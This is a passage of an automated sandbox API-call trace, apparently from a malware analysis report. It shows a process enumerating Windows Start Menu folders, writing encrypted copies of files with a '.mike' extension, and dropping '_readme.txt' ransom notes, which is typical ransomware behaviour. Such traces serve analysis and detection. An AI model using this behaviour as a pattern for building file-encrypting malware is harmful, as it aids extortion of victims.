lpOldMode=0x2aef60) returned 1 [0156.256] GetFileType (hFile=0x1c8) returned 0x1 [0156.256] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x220 [0156.256] WriteFile (in: hFile=0x1c8, lpBuffer=0x2104964*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x2104964*, lpNumberOfBytesWritten=0x2aefe4*=0x460, lpOverlapped=0x0) returned 1 [0156.256] CloseHandle (hObject=0x1c8) returned 1 [0156.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef6c) returned 1 [0156.257] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\games\\_readme.txt.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.257] GetFileType (hFile=0x1c8) returned 0x1 [0156.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef68) returned 1 [0156.257] GetFileType (hFile=0x1c8) returned 0x1 [0156.260] WriteFile (in: hFile=0x1c8, lpBuffer=0x2107b94*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2107b94*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0156.260] CloseHandle (hObject=0x1c8) returned 1 [0156.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.288] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\games\\_readme.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26696280, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26696280, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x266bc3e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680)) returned 1 [0156.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.288] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\games\\_readme.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x210932c | out: lpFileInformation=0x210932c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26696280, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26696280, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x266bc3e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680)) returned 1 [0156.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.288] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\_readme.txt", dwFileAttributes=0x80) returned 1 [0156.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.290] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\games\\_readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0156.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef90) returned 1 [0156.290] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\games\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8 [0156.291] GetFileType (hFile=0x1c8) returned 0x1 [0156.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef8c) returned 1 [0156.291] GetFileType (hFile=0x1c8) returned 0x1 [0156.292] WriteFile (in: hFile=0x1c8, lpBuffer=0x210b02c*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af028, lpOverlapped=0x0 | out: lpBuffer=0x210b02c*, lpNumberOfBytesWritten=0x2af028*=0x45e, lpOverlapped=0x0) returned 1 [0156.293] CloseHandle (hObject=0x1c8) returned 1 [0156.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.294] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8038cbd7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8e194aab, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8e194aab, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x208, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0156.294] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c6f3f20, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c6f3f20, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c71a080, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x330, dwReserved0=0x0, dwReserved1=0x0, cFileName="GameExplorer.lnk.mike", cAlternateFileName="GAMEEX~1.MIK")) returned 1 [0156.294] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c71a080, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x267086a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x267086a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0156.294] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26696280, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26696280, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x266bc3e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 1 [0156.295] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26696280, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x26696280, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x266bc3e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt.mike", cAlternateFileName="_READM~1.MIK")) returned 0 [0156.295] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.295] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\.", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java", lpFilePart=0x0) returned 0x3d [0156.295] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0156.295] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.295] CoTaskMemFree (pv=0x508980) [0156.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0156.295] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java", lpFilePart=0x0) returned 0x3d [0156.296] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\", nBufferLength=0x105, lpBuffer=0x2aebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\", lpFilePart=0x0) returned 0x3e [0156.296] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c71a080, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c71a080, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c71a080, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x9f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="About Java.lnk.mike", cAlternateFileName="ABOUTJ~1.MIK")) returned 1 [0156.297] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0156.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0156.298] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk.mike", nBufferLength=0x105, lpBuffer=0x2aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk.mike", lpFilePart=0x0) returned 0x51 [0156.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0156.298] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.298] GetFileType (hFile=0x1c8) returned 0x1 [0156.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0156.298] GetFileType (hFile=0x1c8) returned 0x1 [0156.298] CloseHandle (hObject=0x1c8) returned 1 [0156.299] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.299] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.299] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeb84, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0156.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d8) returned 1 [0156.299] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0156.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0156.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.299] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x211b0b0 | out: lpFileInformation=0x211b0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7401e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7401e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c78c4a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e)) returned 1 [0156.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.299] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.299] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x211b3d0 | out: lpFileInformation=0x211b3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7401e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7401e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c78c4a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e)) returned 1 [0156.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0156.300] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.300] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0156.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.300] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.300] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.300] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.301] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aeb68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", lpFilePart=0x0) returned 0x4e [0156.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc8) returned 1 [0156.301] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af044 | out: lpFileInformation=0x2af044*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0156.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc4) returned 1 [0156.301] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", lpFilePart=0x0) returned 0x4e [0156.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0156.301] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.302] GetFileType (hFile=0x1c8) returned 0x1 [0156.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0156.302] GetFileType (hFile=0x1c8) returned 0x1 [0156.302] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x0 [0156.302] WriteFile (in: hFile=0x1c8, lpBuffer=0x211c274*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x211c274*, lpNumberOfBytesWritten=0x2aefe4*=0x220, lpOverlapped=0x0) returned 1 [0156.303] CloseHandle (hObject=0x1c8) returned 1 [0156.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0156.303] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x211bd6c | out: lpFileInformation=0x211bd6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7401e0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x1c7401e0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x1c78c4a0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e)) returned 1 [0156.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0156.303] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0156.304] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.304] GetFileType (hFile=0x1c8) returned 0x1 [0156.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0156.304] GetFileType (hFile=0x1c8) returned 0x1 [0156.305] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", lpFilePart=0x0) returned 0x4e [0156.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0156.305] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.305] GetFileType (hFile=0x1c8) returned 0x1 [0156.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0156.305] GetFileType (hFile=0x1c8) returned 0x1 [0156.305] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef38*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef38*=0) returned 0x220 [0156.306] WriteFile (in: hFile=0x1c8, lpBuffer=0x2121c78*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x2aefe4, lpOverlapped=0x0 | out: lpBuffer=0x2121c78*, lpNumberOfBytesWritten=0x2aefe4*=0x460, lpOverlapped=0x0) returned 1 [0156.308] CloseHandle (hObject=0x1c8) returned 1 [0156.308] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aea78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", lpFilePart=0x0) returned 0x4e [0156.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef6c) returned 1 [0156.309] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0156.309] GetFileType (hFile=0x1c8) returned 0x1 [0156.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef68) returned 1 [0156.309] GetFileType (hFile=0x1c8) returned 0x1 [0156.310] WriteFile (in: hFile=0x1c8, lpBuffer=0x2124ea8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2124ea8*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0156.311] CloseHandle (hObject=0x1c8) returned 1 [0156.311] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.311] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", lpFilePart=0x0) returned 0x4e [0156.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0156.311] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike" (normalized: "c:\\users\\all users\\microsoft\\windows\\start menu\\programs\\java\\_readme.txt.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0dc | out: lpFileInformation=0x2af0dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2672e800, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2672e800, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2672e800, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x680)) returned 1 [0156.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0156.311] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt", lpFilePart=0x0) returned 0x49 [0156.312] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\_readme.txt.mike", lpFilePart=0x0) returned 0x4e [0156.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0156.312] GetFileAttributesExW (in: lpFileName="C:\\Users\\All 